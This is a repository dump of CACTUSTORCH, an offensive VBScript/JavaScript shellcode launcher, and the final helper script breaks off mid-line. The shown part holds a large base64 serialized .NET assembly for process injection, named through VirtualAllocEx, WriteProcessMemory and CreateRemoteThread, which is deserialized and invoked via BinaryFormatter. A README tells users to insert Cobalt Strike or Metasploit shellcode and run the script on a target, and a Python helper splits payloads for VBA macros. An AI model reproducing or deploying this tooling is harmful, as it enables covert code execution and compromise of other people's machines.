85 | s = s & "EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA"
86 | s = s & "BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC"
87 | s = s & "fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP"
88 | s = s & "AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj"
89 | s = s & "fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB"
90 | s = s & "AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA"
91 | s = s & "ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF"
92 | s = s & "kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG"
93 | s = s & "AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I"
94 | s = s & "qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK"
95 | s = s & "ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB"
96 | s = s & "AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG"
97 | s = s & "AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB"
98 | s = s & "AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW"
99 | s = s & "gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD"
100 | s = s & "AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG"
101 | s = s & "ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I"
102 | s = s & "+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW"
103 | s = s & "gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA"
104 | s = s & "EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW"
105 | s = s & "IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg"
106 | s = s & "1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+"
107 | s = s & "BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA"
108 | s = s & "BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA"
109 | s = s & "AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA"
110 | s = s & "CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB"
111 | s = s & "AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG"
112 | s = s & "KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ"
113 | s = s & "ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA"
114 | s = s & "hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ"
115 | s = s & "AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA"
116 | s = s & "5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ"
117 | s = s & "AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB"
118 | s = s & "aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu"
119 | s = s & "ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA"
120 | s = s & "WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB"
121 | s = s & "AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA"
122 | s = s & "AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN"
123 | s = s & "b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S"
124 | s = s & "RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU"
125 | s = s & "RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP"
126 | s = s & "TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB"
127 | s = s & "VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF"
128 | s = s & "VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT"
129 | s = s & "X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP"
130 | s = s & "VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP"
131 | s = s & "UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ"
132 | s = s & "VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU"
133 | s = s & "WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD"
134 | s = s & "UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP"
135 | s = s & "Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J"
136 | s = s & "Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X"
137 | s = s & "SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO"
138 | s = s & "SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy"
139 | s = s & "ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs"
140 | s = s & "cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl"
141 | s = s & "cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW"
142 | s = s & "YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1"
143 | s = s & "dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh"
144 | s = s & "ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli"
145 | s = s & "dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0"
146 | s = s & "cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz"
147 | s = s & "ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5"
148 | s = s & "Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3"
149 | s = s & "WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI"
150 | s = s & "RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n"
151 | s = s & "AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD"
152 | s = s & "VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz"
153 | s = s & "SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ"
154 | s = s & "bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT"
155 | s = s & "ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt"
156 | s = s & "ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp"
157 | s = s & "bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp"
158 | s = s & "YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh"
159 | s = s & "Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU"
160 | s = s & "ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB"
161 | s = s & "ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk"
162 | s = s & "SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ"
163 | s = s & "cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5"
164 | s = s & "AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX"
165 | s = s & "AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE"
166 | s = s & "IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD"
167 | s = s & "Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE"
168 | s = s & "IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA"
169 | s = s & "AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg"
170 | s = s & "BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS"
171 | s = s & "DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB"
172 | s = s & "AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT"
173 | s = s & "VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3"
174 | s = s & "NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
175 | s = s & "AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA"
176 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
177 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
178 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"
179 | s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"
180 | s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"
181 | s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"
182 | s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"
183 | s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"
184 | s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"
185 | s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"
186 | s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"
187 | s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"
188 | s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"
189 | s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"
190 | s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"
191 | s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"
192 | s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"
193 | s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"
194 | s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
195 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
196 | s = s & "AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
197 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
198 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
199 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
200 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
201 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
202 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
203 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
204 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
205 | s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"
206 | s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"
207 | entry_class = "cactusTorch"
208 |
209 | Dim fmt, al, d, o
210 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
211 | Set al = CreateObject("System.Collections.ArrayList")
212 | al.Add fmt.SurrogateSelector
213 |
214 | Set d = fmt.Deserialize_2(Base64ToStream(s))
215 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
216 | o.flame binary,code
217 | End Sub
218 |
219 | SetVersion
220 | On Error Resume Next
221 | Run
222 | If Err.Number <> 0 Then
223 | Debug Err.Description
224 | Err.Clear
225 | End If
226 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ```
2 | ( ) ( )
3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /(
4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\())
5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\
6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_)
7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || |
8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ |
9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_|
10 |
11 | ```
12 |
13 | Author and Credits
14 | ==================
15 | Author: Vincent Yiu (@vysecurity)
16 |
17 | Credits:
18 | - @cn33liz: Inspiration with StarFighters
19 | - @tiraniddo: James Forshaw for DotNet2JScript
20 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into
21 | - @_RastaMouse: Testing and giving recommendations around README
22 | - @bspence7337: Testing
23 |
24 | Description
25 | ===========
26 |
27 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.
28 |
29 | DotNetToJScript can be found here: https://github.com/tyranid/DotNetToJScript
30 |
31 | Usage:
32 | ======
33 |
34 | * Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example...
35 | * Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework
36 | * Run: cat payload.bin | base64 -w 0
37 | * For JavaScript: Copy the base64 encoded payload into the code variable below
38 |
39 | ```var code = "";```
40 |
41 | * For VBScript: Copy the base64 encoded payload into the code variable below
42 |
43 | ```Dim code: code = ""```
44 | * Then run:
45 |
46 | ```wscript.exe CACTUSTORCH.js``` or ```wscript.exe CACTUSTORCH.vbs``` via command line on the target, or double click on the files within Explorer.
47 |
48 | * For VBA: Copy the base64 encoded payload into a file such as code.txt
49 |
50 | * Run python splitvba.py code.txt output.txt
51 |
52 | * Copy output.txt under the following bit so it looks like:
53 |
54 | ```
55 | code = ""
56 | code = code & " Host CACTUSTORCH Payload
71 | * Fill in fields
72 | * File hosted and ready to go!
73 |
--------------------------------------------------------------------------------
/banner.txt:
--------------------------------------------------------------------------------
1 | ███████╗██████╗ ██╗ ██╗████████╗██╗ ██╗██████╗ █████╗
2 | ██╔════╝██╔══██╗██║ ██║╚══██╔══╝██║ ██║██╔══██╗██╔══██╗
3 | ███████╗██████╔╝██║ ██║ ██║ ██║ ██║██████╔╝███████║
4 | ╚════██║██╔═══╝ ██║ ██║ ██║ ╚██╗ ██╔╝██╔══██╗██╔══██║
5 | ███████║██║ ███████╗██║ ██║ ╚████╔╝ ██████╔╝██║ ██║
6 | ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝
7 |
--------------------------------------------------------------------------------
/splitvba.py:
--------------------------------------------------------------------------------
1 | import os;
2 | import random;
3 | import uuid;
4 | import string;
5 | import sys;
6 | import argparse;
7 |
8 | def banner():
9 | with open('banner.txt', 'r') as f:
10 | data = f.read()
11 |
12 | print "\033[1;31m%s\033[0;0m" % data
13 | print "\033[1;34mSplits base64 encoded payload into chunks for VBA"
14 | print "\033[1;32mAuthor: Vincent Yiu (@vysec, @vysecurity)\033[0;0m"
15 |
16 | def split_len(seq, length):
17 | return [seq[i:i+length] for i in range(0, len(seq), length)]
18 |
19 | if __name__ == '__main__':
20 | banner()
21 | if ((len(sys.argv) > 3) or len(sys.argv) < 3):
22 | # must be not 1
23 | print "Usage: " + sys.argv[0] + "